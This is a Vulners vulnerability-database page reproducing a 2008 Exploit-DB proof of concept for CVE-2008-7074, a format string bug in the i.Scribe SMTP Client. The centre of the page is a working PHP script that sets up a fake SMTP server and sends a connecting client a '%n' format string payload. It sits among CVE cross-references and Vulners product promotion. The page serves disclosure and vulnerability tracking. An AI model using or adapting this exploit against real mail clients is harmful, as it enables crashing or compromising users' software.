Lucene search
+L

i.Scribe SMTP Client 2.00b - 'wscanf' Remote Format String (PoC)

🗓️ 27 Nov 2008 00:00:00Reported by Alfons LujaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

i.Scribe SMTP Client 2.00b Remote Format String (PoC

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-7074
27 Nov 200800:00
circl
cve
CVE
CVE-2008-7074
25 Aug 200910:00
cve
cvelist
Cvelist
CVE-2008-7074
25 Aug 200910:00
cvelist
euvd
EUVD
EUVD-2008-7033
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-7074
25 Aug 200910:30
nvd
prion
Prion
Format string
25 Aug 200910:30
prion
<?php
//I dont have c lol
/*___=++++++++++++__=--=________*****
 0--
  --  i.Scribe smtp client v 1.88 to 2.00 beta
      Format String (wscanf) bug p0c
      vendor : Memecode Software
      grTs;SiD.psycho
      A.Luja 27.11.08

--)(________++++++++++++++++++++---***

___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==
          Or just open nc -l -p 25 lol*/
$host= $_SERVER[SERVER_ADDR];
$port= 25;
$ret = "AAAA%n%n%n%n%n%n%n%n%n";
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\n");
$bind = socket_bind ($socket, $host, $port) or die ("bind error\n");
$listen = socket_listen($socket,1) or die("listen error\n");
printf("--==Fake smtp server ready==----\n");
printf("Now connect here witch iScribe client\n");
if(($acp=socket_accept($socket))!==false){
    printf("Target connected\n");
    sleep(2);
    printf("send evil char\n");
    $hello=socket_write($acp,$ret,strlen($ret));
    printf("done\n");
    socket_close($acp);
}
socket_close($socket);
exit();
?>

//Alfons Luja

# milw0rm.com [2008-11-27]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Nov 2017 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.04893
36